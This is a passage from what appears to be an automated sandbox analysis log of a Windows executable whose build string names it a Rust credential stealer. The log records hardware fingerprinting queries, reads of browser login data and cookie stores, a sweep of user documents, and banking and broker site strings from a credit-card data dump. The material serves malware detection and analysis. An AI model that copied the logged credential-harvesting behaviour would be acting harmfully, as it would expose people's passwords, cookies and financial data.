            Source: C:\Users\user\Desktop\765iYbgWn9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: 765iYbgWn9.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: 765iYbgWn9.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: 765iYbgWn9.exeStatic file information: File size 5438976 > 1048576
            Source: 765iYbgWn9.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3a4a00
            Source: 765iYbgWn9.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x168200
            Source: 765iYbgWn9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: 765iYbgWn9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: mp\Symbols\ntkrnlmp.pdbE source: 765iYbgWn9.exe, 00000000.00000003.2470462357.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: APPDATAlmp.pdb source: 765iYbgWn9.exe, 00000000.00000003.2472147301.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472751371.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471769592.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470462357.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2473008318.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472505961.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471381267.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470855696.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rust_stealer_xss.pdb source: 765iYbgWn9.exe
            Source: Binary string: lmp.pdb source: 765iYbgWn9.exe, 00000000.00000003.2472147301.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472751371.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471769592.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470462357.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2473008318.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472505961.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471381267.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470855696.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\VirtualStore\ntkrnlmp.pdb source: 765iYbgWn9.exe, 00000000.00000003.2465177046.0000019C7100E000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2466096832.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2466310468.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2469067738.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2469257983.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2464719662.0000019C7100E000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465796025.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2468790555.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2468349825.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: JDSOXXXWOA.docxnlmp.pdbE source: 765iYbgWn9.exe, 00000000.00000003.2472147301.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472751371.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471769592.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2473008318.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472505961.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471381267.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470855696.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbE source: 765iYbgWn9.exe, 00000000.00000003.2465177046.0000019C7100E000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2466096832.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2466310468.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2469067738.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2469257983.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2464719662.0000019C7100E000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465796025.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2468790555.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2468349825.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: lmp.pdbE source: 765iYbgWn9.exe, 00000000.00000003.2510453634.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\765iYbgWn9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3432Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3090Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100Thread sleep count: 3432 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100Thread sleep count: 3090 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
            Source: C:\Users\user\Desktop\765iYbgWn9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Jump to behavior
            Source: CreditCardData.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: CreditCardData.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: CreditCardData.0.drBinary or memory string: discord.comVMware20,11696428655f
            Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: CreditCardData.0.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 765iYbgWn9.exe, 00000000.00000003.2474017653.0000019C72E8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMCIZM
            Source: CreditCardData.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: CreditCardData.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: CreditCardData.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: CreditCardData.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: CreditCardData.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: CreditCardData.0.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: CreditCardData.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: CreditCardData.0.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: CreditCardData.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 765iYbgWn9.exe, 00000000.00000003.2470235925.0000019C72E84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: CreditCardData.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: CreditCardData.0.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: CreditCardData.0.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: CreditCardData.0.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: CreditCardData.0.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: CreditCardData.0.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: CreditCardData.0.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: CreditCardData.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: CreditCardData.0.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: CreditCardData.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: CreditCardData.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\CEF\User Data VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\765iYbgWn9.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\IVHSHTCODI.pdf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\IVHSHTCODI.pdf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\JDSOXXXWOA.docx VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\JDSOXXXWOA.docx VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\JDSOXXXWOA.xlsx VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\JDSOXXXWOA.xlsx VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\MNULNCRIYC.png VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\MNULNCRIYC.png VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\MQAWXUYAIK.mp3 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\MQAWXUYAIK.pdf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\MQAWXUYAIK.pdf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\QVTVNIBKSD.jpg VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\TQDGENUHWP.mp3 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\TTCBKWZYOC.jpg VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\TTCBKWZYOC.xlsx VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\TTCBKWZYOC.xlsx VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.docx VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.png VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.png VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\IVHSHTCODI.pdf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\IVHSHTCODI.pdf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\JDSOXXXWOA.docx VolumeInformationJump to behavior
